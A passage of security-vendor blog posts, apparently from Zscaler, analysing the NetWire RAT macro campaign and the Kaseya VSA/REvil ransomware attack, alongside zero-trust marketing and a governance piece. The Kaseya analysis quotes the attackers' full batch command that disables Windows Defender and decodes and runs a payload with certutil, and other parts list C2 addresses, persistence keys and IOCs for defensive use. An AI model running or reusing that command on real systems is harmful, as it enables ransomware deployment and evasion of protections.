payload and execute it. MD5 Hash: 22DF783F7881A7F6973028E21CA19D4F File Name: NSCP-DRAFT-Final.docm Figure 5: Attached .Docm file prompts the user to enable macros 2.) The second document we analyzed has a different title and slightly different text, but is otherwise extremely similar to the first document, and also has a macro code containing a PowerShell script to download the final payload and execute it. MD5 Hash: AB5DAC030DC5FC9ED802C0322168558B File Name: SCO-Cyber-Advisory.docm Figure 6: Another malicious .docm file 3.) The third document we analyzed is also very similar to the first two instances. It contains a macro code containing a PowerShell script to download the final payload and execute it. The content displayed in this document masquerades as a lab handbook related to Institute of Space Technology (IST), Islamabad. MD5 Hash: B6EC09770ED5B34922B0CF56CB17BC95 File Name: Press Note July-SCO.docm Figure 7: Another similar .docm with a malicious macro Technical Analysis of the macro Once the document is opened, attackers try to trick the user by prompting them to enable macros to read the complete document. Once the user enables the macro, an AutoOpen() subroutine is called which then executes a malicious Visual Basic Application (VBA) macro with base-64 encoded URL. The macro downloads the final payload and path to save and execute the payload with the help of a PowerShell command. Figure 8: Macro code with base 64 encoded URL The two functions performed by the macro code are: a.) Download the payload from the given URL in the macro code. b.) Save and execute the payload from the specified path in the macro code. Upon decryption, we get the URL which seems to be a recently compromised website belonging to the National College of Nepal located in Kathmandu. “hxxps://[.]np/admin/assets/js/jquery/tiny/plugins/anchor/.anchor/sysWow64.exe” Figure 9: Decrypted Macro code File Path: <C:\Windows\System32\spool\drivers\color\sysWow64.exe> Technical Analysis of the payload Once PowerShell downloads the final payload (NetwiredRC), it copies itself to the above mentioned path from where it gets executed. NetwireRAT is not a new malware/RAT on the surface. First seen in 2012, it attempts to steal victims' passwords, including login credentials, FTP credentials, credit card data etc. It claims to be available in all OS formats including MacOS, Android and Windows. NetWireRAT is believed to have been used by the Iranian Nation state sponsored group APT33/Elfin back in 2016. Once executed on the victim’s machine, several anti-analysis techniques are used to protect it from analysis. This version of Netwire has recently been employed with new anti-analysis techniques in order to hinder its reversal. Earlier versions involved WinApi usage for anti-analysis tricks like using GetCursorPos(), ZwGetContextThread() to check mouse position and to check register status for breakpoints respectively. The below screenshot shows the usage of GetCursorPos() api as anti-trick in an older version. Figure 10: Anti-Analysis technique used in older version of NetWire In addition to this, the old NetWire malware also checked the registers status against soft breakpoints, as we can see in the above image. For example, the call 'eax' is the call to the API. If we put a breakpoint on that in the debugger, the byte is replaced with 0xCC. That value is checked by NetWire using ZwGetThreadContext() api as an anti-trick. MD5 Hash: 60D234D54C25DCEF19A64DED3A587072 During our analysis, we found that the malware extracts malicious code into the memory and executes it to evade antivirus detection. During static analysis, we have found that the malware is using some important libraries such as WS2_32 library to perform network activity. Figure 11: Import libraries of the malware Debugging the malicious code, we have seen that the malware author has also employed string obfuscation as an anti-analysis trick as shown in figure:12. Figure 12: Obfuscated String Following decryption, we get the following API: “winHttpGetIEProxyConfigForCurrentUser” This piece of code has a self-decryption routine where it allocates a new memory space and then decrypts the code. Figure 13: Self-Decryption Routine Persistence After decryption, the malware assigns HostId randomly and adds it as a registry key. Figure 14: Random HostID key: HKEY_CURRENT_USER\Software\NETwIRe name: HostId key: HKEY_CURRENT_USER\Software\NETwIRe name: Install Date key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run name: sysWOW32 Figure 15: Registry key for persistence. Stealing functionality This malware basically steals sensitive information from the victim's machine. Figure 16: Stealing information A sample of keystrokes logs in a file that is created in the %AppData% directory, which the malware stores in obfuscated form. Figure 17: Keylogs in obfuscated form Command and Control Another thing related to network activity we observed in the new variant was that this new Netwire variant uses WinHttpGetIEProxyConfigForCurrentUser() api ,which retrieves the Internet Explorer proxy configuration for the current user in the system (adversaries use this feature as a network relay between the malware and the proxy server by listening over a certain port). This api retrieves the list of proxy servers in the system. It steals users' sensitive information and browser history stored in the browsers and sends it to the command and control server. During our analysis of the binary structure, we found the hardcoded IP address of the Command and Control server: 66[.]42.43.177. Figure 18: Data to be sent using proxy ThreatLabz observed that NetwireRAT malware sends the collected victim’s data using the proxy server in obfuscated form using the same api (which was decrypted above). This way of sending victims' data using a proxy server is a new feature being implemented in the updated version of NetWireRAT. Config extracted from malware { "C2 list": [ "", "" ], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "-", "Install Path": "C:\\Windows\\System32\\spool\\drivers\\color", "Startup Name": "sysWOW32", "ActiveX Key": "-", "KeyLog Directory": "-" } Cloud Sandbox Detection Zscaler Cloud Sandbox successfully detects the malicious documents as well as the payload. Figure 19: Zscaler Cloud Sandbox detection In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels VBA.Downloader.NetwiredRC Win32.Backdoor.NetwiredRC Conclusion Over the years, cyber criminals have adopted multiple ways to infect their victims with NetwiredRC and achieved lots of success. We are not conclusively attributing this attack to any particular group with high confidence, but similar techniques and NetwireRAT payloads have been utilized by state sponsored groups such as APT33 and Gorgon. Attackers continuously embrace new anti-analysis tricks to evade security solutions; re-packaging of malware makes static analysis even more challenging. The Zscaler ThreatLabz team will continue to monitor this attack, as well as others, to help keep our customers safe. MITRE ATT&CK TTP Mapping Tactic Technique T1547 Boot Logon or AutoStart Execution T1056 Input Capture T1036 Masquerading T1113 Screen Capture T1082 System Information Discovery T1055 Process Hollowing T1555 Credentials From Web Browsers T1074 Data Staged: Local Data Staging Indicators of Compromise (IOC’s) Doc files 22DF783F7881A7F6973028E21CA19D4F AB5DAC030DC5FC9ED802C0322168558B B6EC09770ED5B34922B0CF56CB17BC95 Payload 60D234D54C25DCEF19A64DED3A587072 715788FB520B3873DB406FDF59521AFA 026C1CE7E96A898C23A7CE9A567B9568 617E8CC54BB247091266826225553A25 CnC 66[.]42.43.177:443 Wed, 14 Jul 2021 21:42:27 -0700 Avinash Kumar IT Security in the Pharmaceutical Industry In many ways, mergers and acquisitions (M&As) are a part of daily life in the pharmaceutical industry. They accelerate research and development and lead to rapid results within the industry. However, at first glance, what often seems to be an administrative and organisational task turns out to be a real feat of strength for IT departments. Zero trust architectures introduce speed and security into M&A processes. The pharmaceutical industry lives off continuous innovation and speedy research results. This is where time to market plays a particularly important role: partnerships and takeovers are often the method of choice to gain the upper hand in global competition with clinics, laboratories, and research centres. However, company takeovers generally go hand in hand with a myriad of challenges associated with the IT infrastructure. Systems and data must be aligned, streamlined, and consolidated. The same applies to the network of the newly structured organisation: IP addresses and DNS hosts don't match anymore, port forwarding doesn't go anywhere, and the Network Access Translation (NAT) fails. In addition, merging networks can lead to or create new weak points and security gaps, as well as compliance issues potentially cropping up or even being created. In summary, mergers and acquisitions are hard work for IT. Moreover, they cost time and money for equipment and personnel. Fast and secure Speed and security are concerns that shouldn't be an issue nowadays. As with many other industries, the cloud has the perfect solution for the pharmaceutical sector: a plan based on a software-defined perimeter (SDP) not only simplifies the merging of various IT topologies, it also reduces the attack surface area in a newly merged and large organisation. Basically, instead of placing users on the on-premises network in their own data centres, network access based on zero trust allows for fast and secure access for users through the cloud, without tediously merging two networks. This means that an SDP approach, such as Zscaler’s zero trust network access (ZTNA) solution, Zscaler Private Access, replaces the on-premises network architecture and provides additional benefits from the cloud. ZTNA provides a secure connection between users and applications. Following a prior policy-based authorisation, users are granted secure access to the application they want by using a cloud security platform. A direct, outgoing tunnel from the application to the user is created by means of a cloud connector. The application itself remains invisible to external parties. ZTNA endorses the principle of least privilege, meaning that specific users are only granted precise access rights needed to do the tasks associated with their job. Implementing ZTNA in M&A processes means that individual access can be clearly defined for both companies. Therefore, the organisation that has been acquired never has access to the entire network. For example, employees in the personnel department only have access to HR-relevant apps, the finance department can only access financial data, and research and development can view formulae only once they have been authorised to do so. In other words, the internet becomes a secure company network on which company applications remain hidden from unauthorised users. A principle that satisfies everyone: the company's management team can avoid high costs for network consolidation and optimisation due to M&A. Meanwhile, system administrators can retain oversight of the data traffic from users in real time because migration takes weeks instead of months. Additional resources: Blog: How ZTNA Speeds Time to Value Video: Introduction to Zero Trust Network Access Fri, 16 Jul 2021 08:00:02 -0700 Nils Ullmann ThreatLabZ June 2021 Report: Deconstructing Kaseya Supply-Chain Attack and the Minebridge RAT Campaign This post also appeared on the CXO REvolutionaries site. Read more here. With the petabytes of daily data transactions it secures, the Zscaler ThreatLabZ security research team has a unique view of the latest cybersecurity trends and, more importantly, threat activity. This month, we deconstructed the new Kaseya VSA supply-chain attack and took a deep dive into the Minebridge RAT infection chain. The REvil hackers come back with a Kaseya supply-chain ransomware attack On July 2, 2021, Kaseya, an IT Management software firm, disclosed a security incident impacting their on-premises version of Kaseya's Virtual System Administrator (VSA) software. Kaseya VSA is a cloud-based Managed Service Provider (MSP) platform that allows service providers to patch management, backups, and client monitoring for their customers. Once known, the ThreatLabZ team reported on the attack and deconstructed the attack payload. Per Kaseya, the attack didn’t impact the majority of customers that rely on Software-as-a-Service (SaaS) offerings. Only a small percentage (about 50 worldwide) running on-premise instances of Kaseya VSA server were affected. However, the attack did propagate to more than 1,000 organizations downstream. Based on the most recent information, the REvil gang exploited a zero-day vulnerability in Kaseya VSA server to compromise on-prem versions of VSA Server and then distributed REvil ransomware to target systems belonging to several downstream organizations. The threat actor behind this attack used the compromised Kaseya VSA server to send a malicious script to all clients managed by that VSA server. The script disables some features of Windows Defender and then installs ransomware. Figure 1: Kaseya ransomware attack batch script This variant of REvil (aka Sodinokibi) ransomware uses several techniques to evade security products, including a custom packer. The REvil payload is distributed as a portable executable (PE) with a modified header. One of the key lessons from both SolarWinds Orion and Kaseya VSA supply-chain attacks is that it is vital for organizations to restrict external access to and from these critical IT management assets. Even with trusted tools and partners, organizations must build controls around identity and zero trust policies that securely connect users directly to applications and never networks. With Zero Trust, you can fundamentally eliminate the attack surface by making critical enterprise resources invisible to adversaries and impossible to attack. It is important to note that details from this incident are still emerging, and we will update our coverage advisory with more analysis as they become available. Demystifying the full attack chain of MineBridge RAT In March 2021, we saw threat actors start distributing MineBridge RAT with an updated distribution mechanism. The attack involved a remote access trojan (RAT) that exploits an older vulnerable version of TeamViewer for DLL side-loading, enabling the threat actor to take a wide array of remote follow-on actions. These actions include things such as spying on users or deploying additional malware. In May 2021, Zscaler ThreatLabz uncovered all the components of this complex multi-stage attack chain. This is a first: the entire attack chain hasn’t been documented in its entirety publicly before this. Figure 2: Complete end-to-end attack chain used to deliver MineBridge RAT We discovered that the threat actors are now distributing MineBridge RAT through Windows Installer binaries, masquerading as trading applications. The different stages in this sophisticated attack chain leverage Windows scheduled tasks, PowerShell scripts, reverse SSH tunnels, legitimate binaries such as TeamViewer, and shortened URLs that ultimately lead to the MineBridge RAT execution. The Minebridge RAT threat actors registered the domain "tradingview[.]cyou," a look-alike of the legitimate website "tradingview[.]com." A download link for the malicious TradingView Desktop application was placed on the homepage. The official TradingView desktop application was launched by in December 2020 for the first time, indicating how quickly the threat actor identifies new opportunities to exploit users. Within four months of a legitimate launch of the new official trading application, the threat actor was ready and able to distribute the malicious version of the application to snare unsuspecting traders. Our ThreatLabZ team has a complete technical breakdown of the Minebridge RAT attack in our blog. Zscaler Zero Trust Exchange Coverage: Advanced Threat Protection, SSL Inspection, Advanced Cloud Sandbox. Zscaler Zero Trust Exchange Zscaler manages the world’s largest security cloud. Each day, Zscaler blocks more than 150 million threats to its 4000+ customers. Over the last six months, Zscaler monitored and secured over one trillion cloud application transactions. The Zscaler ThreatLabZ security research team uses state-of-the-art AI and machine-learning technology to analyze Zscaler Zero Trust Exchange traffic and share its findings. Mon, 12 Jul 2021 08:07:53 -0700 Deepen Desai Stop the Next Kaseya Attack Watch the on-demand replay of the July 13th ThreatLabz webinar for a deep dive into the Kaseya attack and how to defend against it. While Americans were prepping for their long Fourth of July weekends, cybercriminals were preparing a widespread ransomware attack on businesses around the world using a vulnerability in the Kaseya VSA remote monitoring and management tool. The attack targeted on-premises instances of the Kaseya VSA server, which allows managed service providers (MSPs) to perform patch management, backups, and client monitoring for their customers. Attackers exploited a zero day vulnerability in the VSA server software in order to distribute REvil ransomware to between 40 and 60 MSPs and, subsequently, the customers of those MSPs -- over 1,000 in total. This mode of proliferation is called a “supply chain” attack, which utilizes the trusted access of an IT tool to gain access to many more organizations’ networks, allowing attackers to multiply their damages many times over. Kaseya—just as SolarWinds, which was exploited in a different supply chain attack earlier this year—is a long-standing and well-regarded IT management solution. The successful attacks on these services prove that any partner with access to your IT environment can quickly become a vulnerability. Zero Trust is the answer. It is critical that you adopt zero trust strategies in order to mitigate business risk from these attacks. There should be no such thing as a trusted partner, nor a trusted employee, nor a trusted device. Access to resources should be on a dynamically controlled, least-privilege basis. Even with trusted tools and partners, organizations must assume that every connection could be a potential attack, and build controls around identity and zero trust policies that securely connect users directly to applications, and never networks. With Zero Trust, you can fundamentally eliminate the attack surface by making enterprise resources invisible to adversaries and impossible to attack-- unlike traditional network security approaches that leave the front door open to threats from trusted sources. Every attack has a series of steps required to succeed -- often referred to as the ‘kill chain’ or ‘attack lifecycle.’ Below, we’ll break down the steps of a typical REvil ransomware attack as outlined in the ThreatLabz Ransomware Review, and will discuss how Zero Trust can stop them: Prevent compromise The first thing attackers have to do is compromise your network, then download and execute malicious payloads. REvil has been known to gain entry through phishing emails, exploit kits, and compromised RDP accounts, also frequently exploiting vulnerabilities in Oracle WebLogic. Many attackers sneak in through encrypted channels, as was likely the case in the Kaseya attack: ThreatLabz found a 500% increase in SSL malware year-over-year in their latest State of Encrypted Attacks report. To prevent this kind of compromise in alignment with the principles of Zero Trust, organizations must: Have full visibility with full inspection of all traffic, whether encrypted or not, to stop malicious downloads, whether through emails, websites, or other channels. Minimize the attack surface. Applications should not be published to the internet to be brute forced or exploited; instead, they should only be accessible through an exchange after proper authentication. Detect and stop malicious activity by keeping security tools up-to-date and using AI-powered detection to discover never-before-seen ransomware variants and analyze behaviors. In-line sandboxing and browser isolation capabilities should be deployed to help identify and stop advanced unknown threats. Control access with strict least-privilege policies that are monitored and addressed for gaps in entitlements, policy, compliance, and configurations. Kaseya has announced that they are rolling out enhancements to their own security to prevent future compromise, including better sandboxing, isolation, and web application firewalls -- important components of the Zscaler Zero Trust Exchange. Prevent lateral movement While it does not appear to have been the case in the Kaseya supply-chain ransomware attack, once an attacker is in your network, they often move laterally to scan your network and find valuable data, which they commonly steal and encrypt in a ransomware attack. To prevent this, organizations should: Segment applications: Microsegmentation is an important cornerstone of zero trust, which limits access to mitigate damage under the assumption that you’ve already been breached. Use a proxy architecture to connect users and workloads directly to the application or resource that they need -- never the network. If an attacker should breach a single application, the damage they can cause stops there. Get proactive with active defense: A less common but extremely effective defense tactic is using active defense or “deception” technologies to identify and stop lateral movement attempts. These tools deploy decoy apps and lures that act as tripwires for attackers, diverting them from the assets they’re actually after while giving your security team high-fidelity alerts that an attack is underway. Prevent data theft About 50% of REvil attacks (along with many other ransomware families) involve attackers stealing data and threatening to publish it, known as “double extortion.” This gives attackers a lot of leverage when making their demands, as organizations have to worry about more than just restoring their data. To ensure that your data stays protected, Zero Trust best practices dictate that you should: Inspect all northbound traffic. Safeguard sensitive data with granular DLP controls that identify and block data leakage or theft across all inline and SSL traffic in real-time. Set policies to only allow communication with known-good destinations: In the case of SolarWinds, attackers took advantage of lax policies that allowed the software to communicate with unknown destinations, which ended up including the DarkSide command-and-control servers. No matter how good your technology is, “default deny” is a critical concept in Zero Trust; you should only allow communications that are required for the tool to function properly. Shield your cloud apps from exposure: Use cloud access security brokers (CASB) to enforce granular controls of sanctioned and unsanctioned cloud apps, while securing sensitive data at rest from theft or accidental exposure. Address cloud misconfigurations: Prevent cloud breaches and data loss by identifying and closing dangerous misconfigurations in SaaS and public clouds. Ransomware and supply chain attacks will surely get worse before they get better: CybersecurityVentures has estimated that cybercrime will cost organizations $6 trillion globally in 2021, and up to $10.5 trillion in 2025. By embracing Zero Trust, security teams can minimize the chances that they will be victimized by these attacks as well as the potential damages that attackers can cause. For more discussion, watch the on-demand replay of our July 13th webinar in which Zscaler CISO Deepen Desai and Research Director Amit Banker discuss the Kaseya attack. To learn more about REvil and other ransomware trends, download a free copy of our report, ThreatLabz Ransomware Review: The Advent of Double Extortion. Wed, 07 Jul 2021 11:16:16 -0700 Mark Brozek Kaseya Supply Chain Ransomware Attack - Technical Analysis of the REvil Payload On July 2, 2021, Kaseya, an IT Management software firm, disclosed a security incident impacting their on-premises version of Kaseya's Virtual System Administrator (VSA) software. Kaseya VSA is a cloud-based Managed Service Provider (MSP) platform that allows service providers to perform patch management, backups, and client monitoring for their customers. Per Kaseya, the majority of their customers that rely on Software-as-a-Service (SaaS) based offerings were not impacted by this issue; only a small percentage (less than 40 worldwide) running on-premise instances of Kaseya VSA server were affected, though it is believed that 1,000+ organizations were impacted downstream. Below is the ThreatLabz technical deep-dive on the attack. For more background, read our full coverage blog here. Infection Overview The threat actor behind this attack identified and exploited a zero day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypt files on the affected systems. The malicious script contained the following Windows batch commands as shown below: C:\windows\system32\cmd.exe /c ping -n 7615 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking1\agent.crt c:\kworking1\agent.exe & del /q /f c:\kworking1\agent.crt C:\Windows\cert.exe & c:\kworking1\agent.exe The PowerShell script present in the commands above disables some features of Windows Defender such as real-time protection, network protection, scanning of downloaded files, sharing of threat information with Microsoft Active Protection Service (MAPS), and automatic sample submission. certutil.exe is used to decode the Base64 encoded payload located in agent.crt and writes the result to an executable file named agent.exe in the working directory of Kaseya. The Windows batch script then executes the agent.exe file, which will create and launch the REvil ransomware payload. REvil/Sodinokibi Ransomware The executable agent.exe is digitally signed with a valid digital signature with the following signer information: Name: PB03 TRANSPORT LTD. Email: Issuer: CN = Sectigo RSA Code Signing CA, O = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB Thumbprint: 11FF68DA43F0931E22002F1461136C662E623366 Serial Number: 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0 Upon execution, the file agent.exe drops two additional files which are present in its resource section with the names SOFTIS and MODLIS. These two files are written to the C:\Windows directory. If the malware is unable to write to this location (e.g., insufficient permissions), these files will alternatively be dropped in the Windows %temp% directory. These two files are the following: MsMpEng.exe - This is a legitimate application of Windows Defender and vulnerable to side-loading attacks. mpsvc.dll - This is an REvil ransomware DLL. The executable file agent.exe then executes MsMpEng.exe, which is vulnerable to a DLL side-loading attack to load the REvil ransomware DLL file mpsvc.dll that is located in the same directory. As a result of the vulnerability, the Windows Defender executable will load the REvil DLL into its own context as shown in Figure 1. Figure 1. Main function of the malicious executable used in the Kaseya attack that drops a vulnerable copy of Windows Defender to load REvil ransomware. This variant of REvil (aka Sodinokibi) ransomware uses several techniques to evade security products. This includes the malware using a custom packer, with the REvil payload distributed as a portable executable (PE) with a modified header as shown in Figure 2 (where the original PE header is shown on the left and the modified header is shown on the right). This is likely designed to evade security software products that are not able to properly handle PE files that have been modified. Figure 2. Modified REvil PE header (the original header is shown on the left, while the Kaseya REvil payload is shown on the right). The malware binary has an embedded encrypted configuration which is decrypted using RC4 encryption at runtime as shown in Figure 3. Figure 3. RC4 decryption of REvil configuration. The REvil ransomware configuration contains specific settings for the malware. The configuration is stored in JSON format with the configuration parameters shown in Table 1. Configuration Key Description arn Establish persistence via an autorun registry value dbg Enable debug mode dmn Semicolon separated list of potential C&C domains et Encryption type (partial or full) exp Attempt to elevate privileges by exploiting a local privilege escalation (LPE) vulnerability img Base64 encoded ransom wallpaper nbody Base64 encoded ransom note net Send beacons to the REvil command and control server nname File name of ransom note dropped in folders where files were encrypted pid Unique ID to identify this attack pk Base64 encoded value of attacker’s public key used to encrypt files prc List of processes to kill rdmcnt Readme count (always set to 0) sub Possible campaign/affiliate ID or just sub version number svc List of services to stop wfld Directories to wipe wht List of whitelisted extensions, folder names and file names wipe Wipe specified directories Table 1. REvil configuration keys and their purpose. The full decrypted configuration for this REvil attack can be found here. This variant of REvil has the key net assigned with the value false, which instructs the ransomware not to beacon information back to the C&C domains after encryption. This is likely to evade network-based signatures that could potentially alert victims to an ongoing attack. The REvil configuration in the Kaseya attack disables persistence through the arn configuration parameter, which may also be designed to evade early-stage detection. Before the encryption process, the registry key HKEY_LOCAL_MACHINE\SOFTWARE\BlackLivesMatter is created to store the victim’s and attacker’s encryption key information and the file extension to be appended, as shown in below Figure 4. Figure 4. Registry key names and values created by REvil ransomware. The registry key values are described below in Table 2. Registry Value Name Description 96Ia6 Victim’s secret key encrypted with the attacker’s public key (“pk”) Ed7 Attacker’s public key JmfOBvhb Encrypted victim’s key (same as key present in ransom note) QIeQ Victim’s public key Ucr1RB Victim’s secret key encrypted with master public key wJWsTYE Extension to be appended after encryption Table 2. REvil registry key values. REvil changes the Windows firewall settings to allow the local system to be discovered on the local network by other computers with the command: netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes File Encryption Process REvil ransomware will encrypt all files that are not contained within the whitelisted filenames and extension fields, which are stored in the configuration. REvil reads each file, encrypts the contents, and writes the result back to the original file to prevent file recovery. After the encryption, a footer is written to the end of the file and the encrypted file is renamed with an appended file extension. REvil ransomware uses a combination of Curve25519 (asymmetric) and Salsa20 (symmetric) encryption algorithms to encrypt files on the system. The Salsa20 encryption key is derived from the victim's public key and secret key of the key pair generated for each file. To decrypt a file, the victim's secret key and file public key must be known. The ransomware writes a footer that has a size of 232 (0xE8) bytes at the end of every encrypted file. The footer metadata contains the information shown below in Table 3. Parameter Data size Description attacker_public_key 0x58 Victim’s secret key encrypted with the attacker’s public key master_public_key 0x58 Victim’s secret key encrypted with a master public key file_public_key 0x20 Public key generated for each file salsa20_nonce 0x8 Salsa-20 nonce crc32_file_public_key 0x4 CRC32 checksum of file_public_key et_config 0x4 Encryption type (0 in this case) sk_size 0x4 Bytes to skip during encryption null_encrypted 0x4 NULL value encrypted with Salsa20 encryption Table 3. REvil footer added to encrypted files. An example REvil footer is shown below in Figure 5, with the corresponding fields highlighted. Figure 5. Footer metadata appended to a file encrypted by REvil. After the encryption, REvil drops a ransom note with the format {random alphanumeric characters}-readme.txt based on the rdmcnt configuration (in this case, rdmcnt is set to zero, so REvil will drop a ransom note in every directory). The ransomware then drops the content to a file from the img configuration value in the Windows %temp% directory and sets the wallpaper to use this file on the infected system. Figure 6 displays a screenshot with the REvil ransom note and wallpaper after the file encryption is completed. Figure 6: REvil ransom note and wallpaper after file encryption. The author of REvil ransomware has posted attack details on their leak website as shown in Figure 7. The group is currently demanding $70 million worth of Bitcoin for a master decryption tool. Figure 7. REvil’s Kaseya attack post on their dark web leak site. Indicators of Compromise (IOCs) The following IOCs can be used to detect REvil infections used in the Kaseya attack. Hash Type Description 95f0a946cd6881dd5953e6db4dfb0cb9 MD5 agent.crt (encoded REvil dropper) 561cffbaba71a6e8cc1cdceda990ead4 MD5 agent.exe (REvil dropper) a47cf00aedf769d60d58bfe00c0b5421 MD5 mpsvc.dll (REvil ransomware) 7ea501911850a077cf0f9fe6a7518859 MD5 mpsvc.dll (REvil ransomware) 2093c195b6c1fd6ab9e1110c13096c5fe130b75a84a27748007ae52d9e951643 SHA256 agent.crt (encoded REvil dropper) d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e SHA256 agent.exe (REvil dropper) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd SHA256 mpsvc.dll (REvil ransomware) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 SHA256 mpsvc.dll (REvil ransomware) The full list of 1200+ hardcoded beacon domains related to this REvil variant can be found here. Tue, 06 Jul 2021 13:37:03 -0700 Mohd Sadique Coverage Advisory for Kaseya VSA Supply-Chain Ransomware Attack Background On July 2, 2021, Kaseya, an IT Management software firm, disclosed a security incident impacting their on-prem version of Kaseya VSA software. Kaseya VSA is a cloud-based MSP platform that allows service providers to perform patch management, backups, and client monitoring for their customers. As per Kaseya, the majority of their customers that rely on SaaS based offering were not impacted by this issue and only a small percentage (less than 40 worldwide) running on-prem instances of Kaseya VSA server were affected. Zscaler Threatlabz is actively tracking the Kaseya VSA supply-chain ransomware attack incident, involving REvil/Sodinokibi ransomware targeting a number of Managed Service Providers (MSPs) and encrypting data for 1000+ businesses they manage. To minimize the adverse impact, Kaseya has shutdown all the SaaS server instances of VSA remote monitoring as a precautionary measure although the impact has been observed in the on-prem version of the VSA servers and they have notified all their customers to shutdown on-prem VSA server instances until they are explicitly notified to bring them back. As per the Kaseya, they have identified the vulnerability that was possibly exploited to compromise the VSA server and will soon release the patch. What is the issue The investigation on this security incident is still in progress and more details are emerging regularly. Based on information available till now, it appears that a zero day vulnerability in the VSA server software was potentially exploited in order to plant a custom malware loader and eventually distribute REvil ransomware to the target systems. The compromised version of VSA will drop a .crt file to a specific path in c:\ which is believed to be distributed through updates from the VSA server. In this case, it was reportedly distributed as 'Kaseya VSA Agent Hot-fix.' A PowerShell command will then disable various Microsoft Defender security measures before decoding the .crt file using legitimate Windows certuit.exe command. The extracted file is saved as agent.exe in the same folder and is responsible for encrypting data on the victim machine. The attacker is leveraging DLL Side Loading technique by making use of an older version of legitimate MS Defender executable to launch the malicious REvil DLL on the victim machines. What can you do to protect yourself? Shutdown all the instances of on-prem VSA servers, if you haven’t already until further communication from Kaseya. While details of this incident are still surfacing and we will update this advisory further, following are some of the best practices for safeguarding and limiting impact from supply-chain attacks. Route all server traffic through Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised systems/servers. Restrict traffic from critical infrastructure to an allow list of known-good destinations Ensure you are inspecting all SSL traffic. Turn on Advanced Threat Protection to block all known command-and-control domains. Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Use Advanced Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload. Limit the impact from a potential compromise by restricting lateral movement with identity-based micro-segmentation (Zscaler Workload Segmentation) and a Zero Trust architecture. Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access. Zscaler coverage Zscaler leveraged the details on the countermeasures published to ensure coverage against the variant of REvil/Sodinokibi ransomware. Enhanced protection has been added wherever necessary across multiple layers of the Zscaler security platform. Below are the threat names of the existing detections: Advanced Threat protection Win32.Ransom.REvil Win32.Ransom.Sodinokibi Win32.Ransom.Revil.LZ Malware protection W32/Agent.DCD.gen!Eldorado Win32_Ransom_Gen_120472 Win32_Ransom_Sodinokibi_120054 W32/Trojan.CTZP-7180 W32/Trojan.NUKQ-0017 W32/Trojan.OSEZ-5971 W32/Trojan.QYHK-7170 W32/Trojan.UAOH-3259 TR/Ransom.Sodinokibi.ufzkr Details related to these threat signatures can be found in the Zscaler Threat Library. Advanced Cloud Sandbox We have ensured that Zscaler Cloud Sandbox flags these Indicators Of Compromise (IOCs). As always, Cloud Sandbox plays a critical role in blocking newer variants of ransomware payloads and providing protection against patient zero infection. Fig: Zscaler sandbox report REvil sample involved in Kaseya supply chain attack The Zscaler ThreatLabz team is actively monitoring this campaign and any activity around REvil/Sodinokibi ransomware to ensure coverage for newer IOCs as they are discovered. The detailed technical analysis of the REvil payload used in Kaseya's VSA server supply chain ransomware attack can be found here. Sun, 04 Jul 2021 15:42:54 -0700 Rohit Hegde Cybersecurity, Governance, and the Implications of Oversight: How your Board of Directors Could be at Risk Read more posts like this on Zscaler's CXO REvolutionaries. Our increasingly entrenched and extensive use of technology in nearly every facet of life urgently calls for security solutions that keep our networks and data safe. While some companies are keeping pace, many are working to upgrade their infrastructures and can miss key gaps in cybersecurity. The latest spate of ransomware attacks across large enterprises with deep pockets and public agencies suggests no one is immune. And this is not the time to make an error. In 2020 alone, data breaches due to ransomware attacks had an average price tag of $4.4 million. This number does not include the impact of ransomware, destructive malware, or hijacked logins and identities. Firms scrambling to ward off attacks from tech-savvy and tactical hackers are driving a booming investment in cybersecurity consulting and solutions. The market is expected to reach $418 billion by 2028. The increase in cybersecurity spending is a reaction to the increase in cyberattacks. In the last year, 43% of businesses were targeted. And data isn’t the only thing on the line. How has the cyberthreat against your organization in your view developed? 2020 Deloitte Cyber Survey: Cyber Security Leadership Chart What is truly at risk with cybersecurity? The threat of data corruption and privacy infractions grows with each passing day. The increased reliance on remote and hybrid work only expedited the damage from security flaws previously exploited on cloud systems and open networks. Companies implementing 5G networks or leveraging the Internet of Things (IoT) approach stand to lose much if they succumb to a cyberattack. But by no means should corporations halt progress due to security fears. And they aren’t: Nearly 80% of companies are rolling out new tech innovation without the means to secure it, and a system breach brings a breach of trust with customers and stakeholders. The result is almost always the same: business operations are disrupted, data is lost or stolen, and the bottom line suffers. Who is truly responsible for cybersecurity infractions? Gone are the days of pushing off technical problems to IT teams. Technology is the core of most modern business enterprises, and that reliance is only becoming more pronounced as time goes on. While we need knowledgeable IT teams in place to implement, monitor, and maintain these systems, the responsibility for their purchase and efficacy falls largely on management. This does not preclude publicly traded companies with a board of director oversight. In fact, as was the case with Target and Equifax, leadership has had to take responsibility for data breaches and their repercussions. The Target legal settlement required an implementation of a security program, independent security assessment, AND executive responsibility moving forward. While the Business Judgment Rule provides comprehensive protections, the courts have considered personal liability for improper security measures and the failure of board members or directors to take reasonable action and responsibility for the prevention of what are often considered preventable situations. And the penalties can be steep and damaging. On top of data loss and a detrimental economic toll on the company, litigation and change management can be costly and time consuming. Cybersecurity regulators, such as the Office of the Comptroller on Currency, are also imposing fines on a massive financial scale for infractions. How to address cybersecurity governance With risk 